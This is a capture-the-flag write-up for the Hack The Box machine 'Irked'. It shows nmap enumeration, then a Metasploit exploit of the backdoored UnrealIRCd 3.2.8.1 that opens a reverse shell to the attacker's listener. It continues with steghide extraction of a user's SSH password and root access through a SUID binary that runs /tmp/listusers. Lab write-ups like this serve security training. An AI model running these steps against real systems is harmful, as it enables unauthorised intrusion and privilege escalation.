Irked is an easy box running a backdoored UnrealIRC installation. I used a Metasploit module to get a shell then ran steghide to obtain the SSH credentials for the low privileged user then got root by exploiting a vulnerable SUID binary.
Tools/Exploits/CVEs used
- steghide
- metasploit
Summary
- UnrealIRCd MSF exploit for initial foothold
- steghide encoded file containing password for user
- SUID binary for priv esc
Nmap
Aside from the typical Apache and OpenSSH services, I noticed that UnrealIRCd is installed.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# nmap -p- -sC -sV 10.10.10.117
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-17 14:02 EST
Nmap scan report for 10.10.10.117
Host is up (0.019s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          33436/udp  status
|_  100024  1          50397/tcp  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
50397/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Webpage
The main page just has a picture and a note about IRC.

UnrealIRCd exploitation
The box is running UnrealIRCd and searchsploit shows thereโs an MSF exploit for it:
1
2
root@ragingunicorn:~/Downloads# searchsploit unrealirc
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)
Getting a shell with Metasploit is easy:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.117     yes       The target address range or CIDR identifier
   RPORT   8067             yes       The target port (TCP)
Payload options (cmd/unix/reverse):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.23      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic Target
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP double handler on 10.10.14.23:4444 
[*] 10.10.10.117:8067 - Connected to 10.10.10.117:8067...
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:8067 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo O1zcz5ML2uK8OjPk;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "O1zcz5ML2uK8OjPk\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.14.23:4444 -> 10.10.10.117:58328) at 2018-11-17 14:08:40 -0500
I have a shell as user ircd:
1
2
3
4
python -c 'import pty;pty.spawn("/bin/bash")'
ircd@irked:~/Unreal3.2$ id
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
The djmardov user home directroy has a .backup file that contains the password for some stego encoded file:
1
2
3
4
5
6
7
8
9
10
11
djmardov@irked:~/Documents$ ls -la
ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3 04:40 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt
djmardov@irked:~/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
Password: UPupDOWNdownLRlrBAbaSSss
Since the note mentionned stego and this box is rated as easy, I guessed that it would be an off-the-shelf tool like steghide and not some custom obfuscation. The hidden file is found in the irked.jpg image from the main page and the steg doesnโt use any passphrase.
1
2
3
4
5
6
root@ragingunicorn:~/Downloads# steghide extract -sf irked.jpg 
Enter passphrase: 
wrote extracted data to "pass.txt".
root@ragingunicorn:~/Downloads# 
root@ragingunicorn:~/Downloads# cat pass.txt
Kab6h+m+bbp2J:HG
djmardovโs password is: Kab6h+m+bbp2J:HG
I can SSH in and get the user flag:
1
2
3
djmardov@irked:~/Documents$ cat user.txt
cat user.txt
4a66a7...
Priv esc
I found a suspicious SUID file: /usr/bin/viewuser
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
djmardov@irked:~$ find / -perm /4000 2>/dev/null
find / -perm /4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
When I execute the file, I see it runs /tmp/listusers
1
2
3
4
5
6
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2018-11-17 13:54 (:0)
djmardov pts/1        2018-11-17 14:19 (10.10.14.23)
sh: 1: /tmp/listusers: not found
Since itโs a running as root and I have write access to tmp I can just copy /bin/sh to /tmp/listusers and gain root
1
2
3
4
5
6
7
8
9
djmardov@irked:~$ cp /bin/sh /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2018-11-17 13:54 (:0)
djmardov pts/1        2018-11-17 14:19 (10.10.14.23)
# cd /root
# cat root.txt
8d8e9e...
 
        
      